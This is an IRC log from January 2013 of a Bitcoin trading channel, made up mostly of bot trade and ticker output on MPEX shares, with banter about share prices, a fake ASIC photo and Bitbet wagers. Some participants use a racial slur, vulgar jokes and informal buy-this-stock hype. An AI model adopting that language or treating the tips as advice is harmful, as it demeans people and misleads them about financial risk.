1D: 0.00481977 / 0.00510583 / 0.00525532 (44472 shares, 227.07 BTC), 7D: 0.00449034 / 0.00477805 / 0.00598999 (1962226 shares, 9,375.62 BTC), 30D: 0.0014 / 0.00374799 / 0.00598999 (11176625 shares, 41,889.98 BTC) Jan 20 22:11:56 yea Jan 20 22:12:00 I am getting a lot of interest from friends Jan 20 22:12:08 and friends of friends Jan 20 22:14:03 getting to be a significant amount of coins people want me to manage. Jan 20 22:18:51 is it real? Jan 20 22:18:51 http://puu.sh/1Q8qQ Jan 20 22:20:12 nice Jan 20 22:20:14 congrats Jan 20 22:21:09 Bugpowder: you reccommend buying mpoe? Jan 20 22:21:39 well Jan 20 22:21:41 Bugpowder would you buy some S.MPOE for me? Jan 20 22:21:45 I'll send you btc Jan 20 22:21:48 I have no fundssss Jan 20 22:21:50 oh Jan 20 22:21:50 looks fake to me Jan 20 22:21:50 push them to smickles Jan 20 22:22:01 i can see because of some pixels Jan 20 22:22:06 mircea popescu give bugpowder money on my behalf so he can buy me some mpoe Jan 20 22:22:16 why? Jan 20 22:22:19 just deposit lol Jan 20 22:22:20 well Jan 20 22:22:30 actually I've been meaning to ask about margin Jan 20 22:22:56 jcpham heya Jan 20 22:23:15 gang's all here now Jan 20 22:23:19 hi smickles Jan 20 22:23:23 jcpham no, not handled. you still have to say hi, and then enter your judgement Jan 20 22:23:43 Tritonio not afaik ? Jan 20 22:23:55 smickles is havin' internets trouble Jan 20 22:25:05 oh dear me, this has been a weird weekend. There appears to be a certain delta flight with an inflight entertainment in the form of a model, a webcam, and an egg. Jan 20 22:25:12 lol my father just called, "son, 10k eur. buy. now." << haha cool Jan 20 22:25:38 !ticker mpex s.dice Jan 20 22:25:39 [MPEX:S.DICE] 1D: 0.00481977 / 0.00510583 / 0.00525532 (44472 shares, 227.07 BTC), 7D: 0.00449034 / 0.00477811 / 0.00598999 (1959497 shares, 9,362.70 BTC), 30D: 0.0014 / 0.00374799 / 0.00598999 (11176625 shares, 41,889.98 BTC) Jan 20 22:26:32 [MPEX] [S.DICE] 3600 @ 0.00522625 = 18.8145 BTC [+] Jan 20 22:26:48 hopefully many people are saying that this weekend Jan 20 22:26:58 and monday the price goes to $30 Jan 20 22:29:24 lol Jan 20 22:37:14 I herd asic are shipping, time to panic sell Jan 20 22:39:16 if people are that stupid, they deserve to lose their coins Jan 20 22:40:27 not their coins anyway :D Jan 20 22:41:00 So does avalon open the second round of orders before anyone actually gets their delivery ??? Jan 20 22:41:04 ;;ticker Jan 20 22:41:05 BTCUSD ticker | Best bid: 15.64105, Best ask: 15.72499, Bid-ask spread: 0.08394, Last trade: 15.64105, 24 hour volume: 25222.05976602, 24 hour low: 15.51000, 24 hour high: 15.89000, 24 hour vwap: 15.70664 Jan 20 22:41:09 oh shit Jan 20 22:41:11 price on the move Jan 20 22:41:22 PANIC BUY Jan 20 22:41:59 [HAVELOCK] [SDICE] 1 @ 0.579 BTC [-] Jan 20 22:42:07 lmao jeez you guise Jan 20 22:44:33 more like price stuck in a boring channel for literally HOURS Jan 20 22:44:35 [MPEX] [S.MPOE] 3200 @ 0.00062068 = 1.9862 BTC [+] Jan 20 22:44:47 ^^. Jan 20 22:45:03 SELL GODDAMNIT Jan 20 22:45:19 mpoe price is on the move too Jan 20 22:45:33 someone must have been dumping stock bought at .0003 Jan 20 22:45:51 S.MPOE is the hing to buy Jan 20 22:45:54 rite now Jan 20 22:45:56 and S.DICE Jan 20 22:46:11 also S.BBET Jan 20 22:46:42 [MPEX] [S.MPOE] 5752 @ 0.00061858 = 3.5581 BTC [-] Jan 20 22:46:43 what, it's low ? Jan 20 22:46:44 [MPEX] [S.MPOE] 3750 @ 0.00061824 = 2.3184 BTC [-] Jan 20 22:46:45 [MPEX] [S.MPOE] 7556 @ 0.00061614 = 4.6556 BTC [-] Jan 20 22:46:49 o hey, 61. Jan 20 22:46:50 S.MPOE Jan 20 22:46:55 HISTORIC LOWS Jan 20 22:47:14 hehe historic lows are 0.00002858 my fine feathered friend. Jan 20 22:47:17 ;;ticker Jan 20 22:47:17 BTCUSD ticker | Best bid: 15.66001, Best ask: 15.74900, Bid-ask spread: 0.08899, Last trade: 15.74900, 24 hour volume: 25213.40463004, 24 hour low: 15.51000, 24 hour high: 15.89000, 24 hour vwap: 15.70686 Jan 20 22:51:28 http://bitbet.us/bet/1/usagi-ftw/ - that's a funny bet Jan 20 22:52:15 people are likely dumping inventory to possibly sell options or something Jan 20 22:55:43 ;;calc 17 + 19 Jan 20 22:55:43 36 Jan 20 22:55:50 lol Jan 20 22:55:58 someone is gonna figure that one out Jan 20 22:56:30 JUST one 10,000 BTC buy is all I ask lord Jan 20 22:56:40 fuck you Jan 20 22:56:50 ;;asks 16.44 Jan 20 22:56:51 There are currently 9850.6022 bitcoins offered at or under 16.44 USD, worth 157653.528739 USD in total. Jan 20 22:56:57 sell down to $10 nao Jan 20 22:57:11 or baby jesus masturbates a kitten Jan 20 22:58:10 ;;bids 15.27 Jan 20 22:58:12 There are currently 10108.685 bitcoins demanded at or over 15.27 USD, worth 156379.594459 USD in total. Jan 20 23:02:29 [MPEX] [S.MPOE] 1624 @ 0.00062068 = 1.008 BTC [+] Jan 20 23:12:33 [MPEX] [S.MPOE] 10050 @ 0.00062068 = 6.2378 BTC [+] Jan 20 23:16:48 [BTCTC] [MININGCO.ETF] 4 @ 0.5 = 2 BTC Jan 20 23:19:34 lol dub you wants to buy moar ? Jan 20 23:19:43 i'll sell you lukejr coins, 25 a pop. Jan 20 23:19:54 ;;ticker Jan 20 23:20:00 BTCUSD ticker | Best bid: 15.75000, Best ask: 15.76990, Bid-ask spread: 0.01990, Last trade: 15.71001, 24 hour volume: 25039.11971422, 24 hour low: 15.51000, 24 hour high: 15.89000, 24 hour vwap: 15.70869 Jan 20 23:20:15 jaysus. Jan 20 23:20:20 it may pop any minute Jan 20 23:26:19 [MPEX] [S.MPOE] 12044 @ 0.00061614 = 7.4208 BTC [-] Jan 20 23:26:21 [MPEX] [S.MPOE] 906 @ 0.00061534 = 0.5575 BTC [-] Jan 20 23:45:50 WE STILL HAVE ROOM FOR MORE ORDERS SO Get IN WHILE YOU STILL CAN! I stake my personal name and word on that. Jan 20 23:46:33 does that mean we get to call ourselves pigeons if you don't deliver Jan 20 23:46:46 my personal name Jan 20 23:46:53 bob? Jan 20 23:46:55 pigeons is my public name Jan 20 23:46:59 yes bob Jan 20 23:47:04 :D Jan 20 23:47:32 and no, not if i don't deliver Jan 20 23:47:41 if we don't have room for more orders Jan 20 23:47:47 ah :p Jan 20 23:52:44 coinbr finally passed a test by correctly processing simultaneous new orders with same mpsic/price Jan 20 23:53:39 [MPEX] [S.MPOE] 13300 @ 0.00062068 = 8.255 BTC [+] Jan 20 23:54:49 jurov: :) approve my latest fund so i can put more orders :) Jan 20 23:56:56 pigeons o you found it huh ? Jan 20 23:57:58 [HAVELOCK] [SDICE] 9 @ 0.55 = 4.95 BTC [-] Jan 20 23:58:37 FabianB, it waits till mircea accepts it Jan 20 23:59:07 i rather won't do fractional reserve. not even for friends ;) Jan 21 00:04:14 this is unacceptable. Jan 21 00:07:11 FabianB, go on. Jan 21 00:07:31 unacceptable? Jan 21 00:07:55 lets go falcons Jan 21 00:08:25 jurov doesn't unit test Jan 21 00:08:29 don't trust his code Jan 21 00:09:01 kakobrekla: accept my bet Jan 21 00:09:11 jurov: didn't know you already forwarded it to mpex Jan 21 00:09:26 thestringpusher, why do you think? Jan 21 00:09:32 jurov wordplay hehe Jan 21 00:10:37 I like that Jan 21 00:10:40 thestringpuhser Jan 21 00:10:45 thestringpusher* Jan 21 00:11:00 when I have money to hire a sock puppet that is what he/she'll be called Jan 21 00:11:10 i do unit test. just left some unlikely scenarios for later, cause i'm lazy. Jan 21 00:11:23 nigga puh-lease Jan 21 00:11:24 now they become more and more likely Jan 21 00:11:59 whoa fdp got like 10% Jan 21 00:12:42 mircea_popescu: yeah, no-one expected that Jan 21 00:12:54 srsly. Jan 21 00:13:00 cdu getting butchered was kinda in the books Jan 21 00:13:31 and the pirates did jack shit huh Jan 21 00:14:36 thestringpuller i dont approve bets. Jan 21 00:20:17 pirates seem to have high volatility in elections Jan 21 00:22:44 0 seats tho, i don't imagine they expected that. Jan 21 00:25:45 so http://bitbet.us/bet/36/liberals-fdp-5-in-lower-saxony-state/ can be resolved Jan 21 00:26:51 indeed. Jan 21 00:31:31 [MPEX] [S.MPOE] 178 @ 0.00062068 = 0.1105 BTC [+] Jan 21 00:31:33 [MPEX] [S.MPOE] 2000 @ 0.00062084 = 1.2417 BTC [+] Jan 21 00:31:34 [MPEX] [S.MPOE] 2300 @ 0.00062385 = 1.4349 BTC [+] Jan 21 00:31:36 [MPEX] [S.MPOE] 7368 @ 0.0006246 = 4.6021 BTC [+] Jan 21 00:31:37 [MPEX] [S.MPOE] 2854 @ 0.00062622 = 1.7872 BTC [+] Jan 21 00:32:14 an alleged avalon asic image https://www.devda.ch/node/12 Jan 21 00:32:42 ya was here earlier Jan 21 00:34:50 6 Jan 21 00:35:40 ;;google falcons score Jan 21 00:35:42 Atlanta Falcons Football Clubhouse - ESPN: ; Atlanta Falcons on Yahoo! Sports - News, Scores, Standings ...: ; Official Website of the Atlanta Falcons Football Club: Jan 21 00:35:43 [MPEX] [O.BTCUSD.P140T] 563 @ 0.018824 = 10.5979 BTC [+] Jan 21 00:35:55 [MPEX] [O.BTCUSD.P150T] 1000 @ 0.03626506 = 36.2651 BTC [-] Jan 21 00:36:04 [MPEX] [O.BTCUSD.P160T] 1000 @ 0.06205928 = 62.0593 BTC [-] Jan 21 00:36:20 markedathome: source? Jan 21 00:36:24 boom Jan 21 00:36:26 [MPEX] [O.BTCUSD.P180T] 1000 @ 0.14987357 = 149.8736 BTC [-] Jan 21 00:36:28 [MPEX] [O.BTCUSD.P170T] 1000 @ 0.09597135 = 95.9714 BTC [-] Jan 21 00:36:31 mpoe dumped an put into options Jan 21 00:36:33 mwahahahahah Jan 21 00:36:39 i iz wizard Jan 21 00:37:12 these look like sales Jan 21 00:37:28 to the bot no? Jan 21 00:37:32 ya Jan 21 00:38:12 Anduck: http://www.reddit.com/r/Bitcoin/comments/16xyv6/first_avalon_asic_picture/ Jan 21 00:38:28 ok ty Jan 21 00:38:38 ya someone is writing contracts to the bot from inventory the dumped from mpoe Jan 21 00:38:41 it's brilliant really Jan 21 00:38:54 my how I love MPEX, it was like yesterday you were just a baby Jan 21 00:39:48 o i c Jan 21 00:40:03 a e i? Jan 21 00:40:05 y? Jan 21 00:40:31 oh i see Jan 21 00:40:41 do you really? Jan 21 00:40:44 or are you actually blind? Jan 21 00:41:05 http://polimedia.us/dtng/c/src/135872157621.jpg Jan 21 00:41:37 people must like posting themselves naked on your blog Jan 21 00:41:38 haha Jan 21 00:42:31 [MPEX] [S.MPOE] 6286 @ 0.00062622 = 3.9364 BTC [+] Jan 21 00:43:03 the price go back up though because so many people want to buy Jan 21 00:45:12 < thestringpuller> smickles is havin' internets trouble << more like bitvps is Jan 21 00:45:35 thestringpuller, not yet. the mpoe order book still looks scary Jan 21 00:46:01 that pic is not taken off avalon miner Jan 21 00:46:02 fyi Jan 21 00:46:13 smickles Jan 21 00:46:15 got my pm? Jan 21 00:46:25 yes, just saw it Jan 21 00:46:56 Anduck i called fake first! Jan 21 00:47:04 aww Jan 21 00:47:06 didnt see Jan 21 00:47:11 but its fake. Jan 21 00:47:15 you're right Jan 21 00:47:29 Jan 20 22:21:50 looks fake to me Jan 21 00:47:29 Jan 20 22:21:50 push them to smickles Jan 21 00:47:29 Jan 20 22:22:01 i can see because of some pixels Jan 21 00:48:13 nice odds: http://bitbet.us/bet/34/ Jan 21 00:49:00 ;;later bugpowder what did you want to ask about margin ? i missed it at the time, luckily someone mentioned avalon fake pic and i had to dig through logs. Jan 21 00:49:02 Error: The "Later" plugin is loaded, but there is no command named "bugpowder" in it. Try "list Later" to see the commands in the "Later" plugin. Jan 21 00:49:04 [MPEX] [S.MPOE] 25600 @ 0.00062622 = 16.0312 BTC [+] Jan 21 00:49:05 ;;later tell bugpowder what did you want to ask about margin ? i missed it at the time, luckily someone mentioned avalon fake pic and i had to dig through logs. Jan 21 00:49:05 The operation succeeded. Jan 21 00:49:07 omfg. Jan 21 00:49:44 jurov lol it went from .25 to 4 today Jan 21 00:50:02 http://bitbet.us/bet/147/mtgox-out-of-business-by-end-of-year/ Jan 21 00:50:13 you'd think people give it better chances of survival than 2 out of 3 ? Jan 21 00:51:24 don't you plan assbot or gribble bbet plugin? Jan 21 00:51:38 not a bad idea. Jan 21 00:51:51 !bet "Milos Zeman" Jan 21 00:52:12 nah. Jan 21 00:52:25 no clue Jan 21 00:52:28 lmao Jan 21 00:52:44 (Y) Jan 21 00:52:45 [MPEX] [S.MPOE] 24100 @ 0.00062622 = 15.0919 BTC [+] Jan 21 00:52:55 what do you want anyway, search? Jan 21 00:53:29 both search and ticker. Jan 21 00:53:35 tho it could be in a #bitbet chan Jan 21 00:54:32 ill see what i can do Jan 21 00:54:43 I don't know those people, and they don't look very friendly. Jan 21 00:54:54 there I am again Jan 21 00:54:54 !sudo make bitbet interface Jan 21 00:55:11 anyone wanna bet if I last more than 2 min. this time? Jan 21 00:55:19 fuck Jan 21 00:55:24 i imagine a mtgox "out of business" would mostly be a united states vs. mtgox thing Jan 21 00:55:26 I bet 4 minutes Jan 21 00:55:42 why hasn't my MPOE bet gone in yet Jan 21 00:55:55 !ticker bring me kakobrekla Jan 21 00:55:56 thestringpuller: notice I didn't even finish that line b/f it dropped Jan 21 00:55:56 You know, I've had it up to here with this Indian malarkey. Jan 21 00:56:08 sup Jan 21 00:56:10 that's racist Jan 21 00:56:27 approve my bet yo so I can throw down mad btc Jan 21 00:56:31 racist? more like country-ist Jan 21 00:56:33 pop rubberbands and shit Jan 21 00:56:34 bug mircea_popescu Jan 21 00:56:49 smickles which datacenter is that vps in Jan 21 00:56:50 mircea_popescu is always "busy" Jan 21 00:56:58 ya well Jan 21 00:57:06 not much i can do bout that Jan 21 00:57:12 i see how it is kakobrekla Jan 21 00:57:26 how is it? Jan 21 00:57:27 jcpham: the californian one Jan 21 00:57:30 it's because I'm black Jan 21 00:57:35 you racist Jan 21 00:57:37 lol Jan 21 00:57:40 i thoght you were Indian Jan 21 00:58:08 switzerland doesn't seem to have that problem fwiw Jan 21 00:58:18 no but srsly thestringpuller it has nothing to do with you Jan 21 00:58:46 thestringpuller, i just dont approve or resolve bets so i dont get in a way of person that does that Jan 21 00:59:36 already contacted them? go to #bitvps Jan 21 00:59:51 [MPEX] [S.DICE] 650 @ 0.00515772 = 3.3525 BTC [-] Jan 21 01:00:39 thestringpuller what's your hurry, not like it hits 100 today. Jan 21 01:00:59 I just like pretending to be the impatient 12 year old Jan 21 01:01:05 "ARE WE THERE YET? ARE WE THERE YET?" Jan 21 01:01:11 you're prolly the only one Jan 21 01:01:33 Don't lose you childhood spirit! Jan 21 01:01:42 Welcome to the world of Imaginaaation. Jan 21 01:04:01 yaaaaaaay Jan 21 01:05:57 [MPEX] [S.DICE] 52 @ 0.00522625 = 0.2718 BTC [+] Jan 21 01:12:19 !ticker S.BBET Jan 21 01:12:19 I prepared your canoe with cedar boughs. Jan 21 01:12:25 !ticker m S.BBET Jan 21 01:12:27 [MPEX:S.BBET] 1D: 0.00100008 / 0.00100596 / 0.00129998 (10200 shares, 10.26 BTC), 7D: 0.00100007 / 0.00154533 / 0.0018 (260946 shares, 403.25 BTC), 30D: 0.000337 / 0.00078306 / 0.0035 (2257312 shares, 1,767.63 BTC) Jan 21 01:13:22 sell yo puts Jan 21 01:26:14 I prepared my canoe with sonar yesterday Jan 21 01:27:07 going to lay waste to some fish this arfternoon Jan 21 01:28:48 hi! Jan 21 01:29:01 hi! Jan 21 01:32:46 hi? Jan 21 01:32:54 from assbot? Jan 21 01:34:16 Yes smickles__, I'm smart like that. Jan 21 01:35:00 or assbot is manually controled. Jan 21 01:35:04 controlled* Jan 21 01:35:37 naw, i'ts got 'bot' in the name Jan 21 01:36:44 wait till it starts asking for help Jan 21 01:39:33 ;;rated assbot Jan 21 01:39:34 You have not yet rated user assbot Jan 21 01:39:58 ;;rate assbot -10 scammer Jan 21 01:39:58 Error: For identification purposes, you must be identified via GPG to use the rating system. Jan 21 01:40:03 nah Jan 21 01:40:07 [MPEX] [S.DICE] 3250 @ 0.00525495 = 17.0786 BTC [+] Jan 21 01:40:43 ;;later tell assbot ass, bot! Jan 21 01:40:45 hahaha Jan 21 01:40:45 The operation succeeded. Jan 21 01:40:55 [BTCTC] [BASIC-MINING] 18 @ 0.339 = 6.102 BTC [+] Jan 21 01:40:59 ;;getrating assbot Jan 21 01:41:00 This user has not yet been rated. WARNING: Currently not authenticated. Jan 21 01:41:24 we need an asspot to go with the assbot Jan 21 01:42:02 is he old enough for toilet training? Jan 21 01:42:06 smickles is like, on dial-up. and some friendly 70yo neighbour keeps picking up the receiver. Jan 21 01:42:15 is he old enough for toilet trading? << fify Jan 21 02:06:33 [MPEX] [S.MPOE] 24000 @ 0.00062532 = 15.0077 BTC [-] Jan 21 02:06:35 [MPEX] [S.MPOE] 12376 @ 0.00062149 = 7.6916 BTC [-] Jan 21 02:10:07 [BTCTC] [RSM] 117 @ 0.0085 = 0.9945 BTC [-] Jan 21 02:13:23 [MPEX] [S.MPOE] 2300 @ 0.00062149 = 1.4294 BTC [-] Jan 21 02:18:43 http://xbradtc.files.wordpress.com/2010/05/may20.jpg Jan 21 02:22:08 [MPEX] [O.BTCUSD.P170T] 820 @ 0.09472763 = 77.6767 BTC [-] Jan 21 02:22:13 [MPEX] [O.BTCUSD.P160T] 1000 @ 0.06097484 = 60.9748 BTC [-] Jan 21 02:22:22 [MPEX] [O.BTCUSD.P150T] 1000 @ 0.03541299 = 35.413 BTC [-] **** BEGIN LOGGING AT Mon Jan 21 08:02:58 2013 Jan 21 08:04:12 [MPEX] [S.MPOE] 1815 @ 0.00062045 = 1.1261 BTC [+] Jan 21 08:04:14 [MPEX] [S.MPOE] 8884 @ 0.00062249 = 5.5302 BTC [+] Jan 21 08:04:15 [MPEX] [S.MPOE] 25414 @ 0.00062277 = 15.8271 BTC [+] Jan 21 08:04:15 [MPEX] [S.MPOE] 32090 @ 0.00062388 = 20.0203 BTC [+] Jan 21 08:04:17 [MPEX] [S.MPOE] 3190 @ 0.000625 = 1.9938 BTC [+] Jan 21 08:19:15 [MPEX] [S.MPOE] 3643 @ 0.000625 = 2.2769 BTC [+] Jan 21 08:19:17 [MPEX] [S.MPOE] 9311 @ 0.00062507 = 5.82 BTC [+] Jan 21 08:29:37 [MPEX] [S.MPOE] 1373 @ 0.00061743 = 0.8477 BTC [-] Jan 21 08:29:38 [MPEX] [S.MPOE] 6831 @ 0.00061058 = 4.1709 BTC [-] Jan 21 08:29:43 [MPEX] [S.MPOE] 2496 @ 0.00060969 = 1.5218 BTC [-] Jan 21 08:35:46 [MPEX] [S.MPOE] 19189 @ 0.00062507 = 11.9945 BTC [+] Jan 21 08:35:48 [MPEX] [S.MPOE] 6206 @ 0.00062622 = 3.8863 BTC [+] Jan 21 08:35:49 [MPEX] [S.MPOE] 15000 @ 0.00062649 = 9.3974 BTC [+] Jan 21 08:35:54 [MPEX] [S.MPOE] 21100 @ 0.00062886 = 13.2689 BTC [+] Jan 21 08:35:56 [MPEX] [S.MPOE] 5200 @ 0.00063047 = 3.2784 BTC [+] Jan 21 08:35:57 [MPEX] [S.MPOE] 5605 @ 0.0006312 = 3.5379 BTC [+] Jan 21 08:57:58 [MPEX] [S.DICE] 1600 @ 0.00525495 = 8.4079 BTC [+] Jan 21 09:00:15 [MPEX] [S.MPOE] 6383 @ 0.00061811 = 3.9454 BTC [-] Jan 21 09:17:14 [MPEX] [S.MPOE] 5517 @ 0.00061811 = 3.4101 BTC [-] Jan 21 09:32:24 [MPEX] [S.MPOE] 9491 @ 0.00061522 = 5.8391 BTC [-] Jan 21 09:32:26 [MPEX] [S.MPOE] 7320 @ 0.00060969 = 4.4629 BTC [-] Jan 21 09:34:42 [MPEX] [O.BTCUSD.C200T] 15 @ 0.05139051 = 0.7709 BTC [+] Jan 21 09:40:20 [MPEX] [S.MPOE] 5450 @ 0.00060969 = 3.3228 BTC [-] Jan 21 09:52:47 [MPEX] [S.MPOE] 4100 @ 0.00060969 = 2.4997 BTC [-] Jan 21 10:07:22 !ticker mpex s.dice Jan 21 10:07:23 [MPEX:S.DICE] 1D: 0.00481977 / 0.00513888 / 0.00525495 (42792 shares, 219.90 BTC), 7D: 0.00449034 / 0.00478954 / 0.00598999 (1891602 shares, 9,059.91 BTC), 30D: 0.0032 / 0.00414851 / 0.00598999 (9437928 shares, 39,153.42 BTC) Jan 21 10:14:46 [MPEX] [S.MPOE] 2506 @ 0.00060969 = 1.5279 BTC [-] Jan 21 10:14:48 [MPEX] [S.MPOE] 8350 @ 0.00060884 = 5.0838 BTC [-] Jan 21 10:14:49 [MPEX] [S.MPOE] 1644 @ 0.00060756 = 0.9988 BTC [-] Jan 21 10:31:37 [MPEX] [S.MPOE] 12756 @ 0.00060756 = 7.75 BTC [-] Jan 21 10:31:39 [MPEX] [S.MPOE] 4409 @ 0.00060731 = 2.6776 BTC [-] Jan 21 10:33:30 [MPEX] [S.MPOE] 12423 @ 0.00060731 = 7.5446 BTC [-] Jan 21 10:33:32 [MPEX] [S.MPOE] 2827 @ 0.00060336 = 1.7057 BTC [-] Jan 21 10:48:28 [MPEX] [S.MPOE] 4436 @ 0.00060336 = 2.6765 BTC [-] Jan 21 11:00:37 [BTCTC] [COGNITIVE] 2 @ 0.405 = 0.81 BTC [-] Jan 21 11:00:40 [BTCTC] [COGNITIVE] 5 @ 0.4 = 2 BTC [-] Jan 21 11:10:05 [MPEX] [S.MPOE] 10787 @ 0.00060336 = 6.5084 BTC [-] Jan 21 11:10:07 [MPEX] [S.MPOE] 2800 @ 0.00060287 = 1.688 BTC [-] Jan 21 11:10:08 [MPEX] [S.MPOE] 41300 @ 0.0006017 = 24.8502 BTC [-] Jan 21 11:10:13 [MPEX] [S.MPOE] 10263 @ 0.00060168 = 6.175 BTC [-] Jan 21 11:14:51 [MPEX] [S.DICE] 300 @ 0.00518427 = 1.5553 BTC [-] Jan 21 11:14:53 [MPEX] [S.DICE] 2116 @ 0.00525495 = 11.1195 BTC [+] Jan 21 11:21:32 [MPEX] [S.MPOE] 6050 @ 0.00061091 = 3.696 BTC [+] Jan 21 11:28:06 [MPEX] [S.MPOE] 6792 @ 0.00061091 = 4.1493 BTC [+] Jan 21 11:30:54 [MPEX] [S.MPOE] 11708 @ 0.00061091 = 7.1525 BTC [+] Jan 21 11:30:56 [MPEX] [S.MPOE] 5192 @ 0.00061096 = 3.1721 BTC [+] Jan 21 11:32:10 [MPEX] [S.MPOE] 1661 @ 0.00060168 = 0.9994 BTC [-] Jan 21 11:38:16 [MPEX] [S.MPOE] 3846 @ 0.00060168 = 2.3141 BTC [-] Jan 21 11:39:05 [HAVELOCK] [KCIM] 1 @ 0.999 BTC [+] Jan 21 11:39:25 [MPEX] [S.MPOE] 1500 @ 0.00060344 = 0.9052 BTC [+] Jan 21 11:46:49 [MPEX] [S.MPOE] 15400 @ 0.00060344 = 9.293 BTC [+] Jan 21 11:50:52 [MPEX] [S.MPOE] 475 @ 0.00060168 = 0.2858 BTC [-] Jan 21 11:50:54 [MPEX] [S.MPOE] 8250 @ 0.00060146 = 4.962 BTC [-] Jan 21 11:50:58 [MPEX] [S.MPOE] 7975 @ 0.00060122 = 4.7947 BTC [-] Jan 21 12:24:23 [MPEX] [S.MPOE] 9300 @ 0.00060123 = 5.5914 BTC [+] Jan 21 12:26:01 [MPEX] [S.MPOE] 250 @ 0.00060123 = 0.1503 BTC [+] Jan 21 12:26:03 [MPEX] [S.MPOE] 8397 @ 0.00060122 = 5.0484 BTC [-] Jan 21 12:35:10 [MPEX] [S.MPOE] 16000 @ 0.00060262 = 9.6419 BTC [+] Jan 21 12:38:24 [MPEX] [S.MPOE] 5079 @ 0.00060122 = 3.0536 BTC [-] Jan 21 12:40:02 [MPEX] [S.DICE] 432 @ 0.0053219 = 2.2991 BTC [+] Jan 21 12:44:00 [MPEX] [S.MPOE] 8100 @ 0.00060122 = 4.8699 BTC [-] Jan 21 13:02:27 [MPEX] [S.MPOE] 15000 @ 0.00060123 = 9.0185 BTC [+] Jan 21 13:02:32 [MPEX] [S.MPOE] 1250 @ 0.00060122 = 0.7515 BTC [-] Jan 21 13:15:38 [MPEX] [S.MPOE] 7300 @ 0.00060262 = 4.3991 BTC [+] Jan 21 13:25:35 [MPEX] [S.MPOE] 4700 @ 0.00060262 = 2.8323 BTC [+] Jan 21 13:25:37 [MPEX] [S.MPOE] 8400 @ 0.00060344 = 5.0689 BTC [+] Jan 21 13:25:38 [MPEX] [S.MPOE] 3579 @ 0.00060893 = 2.1794 BTC [+] Jan 21 13:29:12 [MPEX] [S.DICE] 1500 @ 0.00530239 = 7.9536 BTC [-] Jan 21 13:29:14 [MPEX] [S.DICE] 247 @ 0.00530238 = 1.3097 BTC [-] Jan 21 13:29:15 [MPEX] [S.DICE] 309 @ 0.00525 = 1.6223 BTC [-] Jan 21 13:41:02 Infiniti Poker Set to Go Live in February: Will Use Bitcoins for Americans Jan 21 13:41:02 “Because we’re using Bitcoin, we’re not using U.S. banks—it’s all peer-to-peer,” Hajduk told BusinessWeek.com in regard to fears over potentially breaking current US laws. “I don’t believe we’ll be doing anything wrong. Jan 21 13:41:15 http://www.gambling911.com/poker/infiniti-poker-set-go-live-february-will-use-bitcoins-americans-012013.html Jan 21 13:41:24 bye micon? Jan 21 13:41:38 [MPEX] [S.MPOE] 578 @ 0.00060122 = 0.3475 BTC [-] Jan 21 13:41:40 [MPEX] [S.MPOE] 14222 @ 0.0006011 = 8.5488 BTC [-] Jan 21 13:51:08 [BTCTC] [GSDPT] 6 @ 0.0055 = 0.033 BTC [-] Jan 21 13:53:10 [MPEX] [S.DICE] 420 @ 0.00525 = 2.205 BTC [-] Jan 21 13:53:12 [MPEX] [S.DICE] 852 @ 0.00524149 = 4.4657 BTC [-] Jan 21 13:58:38 thestringpuller, sry i usually don't respond to summons at 04:29 CET Jan 21 13:59:29 ;;ticker Jan 21 13:59:29 BTCUSD ticker | Best bid: 16.40637, Best ask: 16.53418, Bid-ask spread: 0.12781, Last trade: 16.39526, 24 hour volume: 36457.34278264, 24 hour low: 15.63412, 24 hour high: 16.70000, 24 hour vwap: 15.99778 Jan 21 13:59:36 my god Jan 21 14:05:37 lol i just realized, i have a single customer that is larger than whole 1Broker Jan 21 14:06:22 hehe yes it happens :) Jan 21 14:10:36 [MPEX] [S.MPOE] 24991 @ 0.00060232 = 15.0526 BTC [+] Jan 21 14:10:38 [MPEX] [S.MPOE] 6600 @ 0.00060738 = 4.0087 BTC [+] Jan 21 14:13:00 [BTCTC] [ESECURITYSABTC] 10 @ 0.72 = 7.2 BTC [-] Jan 21 14:18:31 [MPEX] [S.MPOE] 2809 @ 0.00060804 = 1.708 BTC [+] Jan 21 14:18:42 [MPEX] [S.MPOE] 3306 @ 0.0006011 = 1.9872 BTC [-] Jan 21 14:18:48 [MPEX] [S.MPOE] 6600 @ 0.00060071 = 3.9647 BTC [-] Jan 21 14:18:49 [MPEX] [S.MPOE] 7200 @ 0.00060061 = 4.3244 BTC [-] Jan 21 14:18:54 [MPEX] [S.MPOE] 5435 @ 0.00060008 = 3.2614 BTC [-] Jan 21 14:22:50 [MPEX] [S.MPOE] 11015 @ 0.00060008 = 6.6099 BTC [-] Jan 21 14:22:51 [MPEX] [S.MPOE] 8685 @ 0.0006 = 5.211 BTC [-] Jan 21 14:24:07 [HAVELOCK] [SDICE] 2 @ 0.57 = 1.14 BTC [+] Jan 21 14:27:11 [MPEX] [S.MPOE] 20750 @ 0.0006 = 12.45 BTC [-] Jan 21 14:35:43 [MPEX] [S.DICE] 884 @ 0.0053 = 4.6852 BTC [+] Jan 21 14:41:28 [MPEX] [S.MPOE] 7800 @ 0.00060893 = 4.7497 BTC [+] Jan 21 14:59:44 down Jan 21 14:59:46 ;;ticker Jan 21 14:59:46 BTCUSD ticker | Best bid: 16.10000, Best ask: 16.10997, Bid-ask spread: 0.00997, Last trade: 16.10000, 24 hour volume: 44684.00628135, 24 hour low: 15.63412, 24 hour high: 16.70000, 24 hour vwap: 16.08003 Jan 21 15:07:54 [MPEX] [S.MPOE] 7000 @ 0.00060419 = 4.2293 BTC [-] Jan 21 15:10:54 [MPEX] [S.MPOE] 3135 @ 0.00060223 = 1.888 BTC [-] Jan 21 15:11:00 [MPEX] [S.MPOE] 11244 @ 0.0006 = 6.7464 BTC [-] Jan 21 15:15:25 !ticker mpex s.dice Jan 21 15:15:27 [MPEX:S.DICE] 1D: 0.004901 / 0.00517549 / 0.0053219 (39777 shares, 205.87 BTC), 7D: 0.00449034 / 0.00479683 / 0.00598999 (1839870 shares, 8,825.55 BTC), 30D: 0.0032 / 0.00414935 / 0.00598999 (9444988 shares, 39,190.63 BTC) Jan 21 15:17:05 [MPEX] [S.MPOE] 24150 @ 0.0006 = 14.49 BTC [-] Jan 21 15:19:21 [MPEX] [S.MPOE] 15490 @ 0.00060419 = 9.3589 BTC [+] Jan 21 15:20:15 [MPEX] [S.MPOE] 18800 @ 0.0006 = 11.28 BTC [-] Jan 21 15:52:07 HEEEYO Jan 21 15:53:05 ;;ticker Jan 21 15:53:05 BTCUSD ticker | Best bid: 16.36843, Best ask: 16.45598, Bid-ask spread: 0.08755, Last trade: 16.45598, 24 hour volume: 46012.49478065, 24 hour low: 15.63412, 24 hour high: 16.70000, 24 hour vwap: 16.09633 Jan 21 16:09:52 [MPEX] [S.DICE] 1650 @ 0.0052699 = 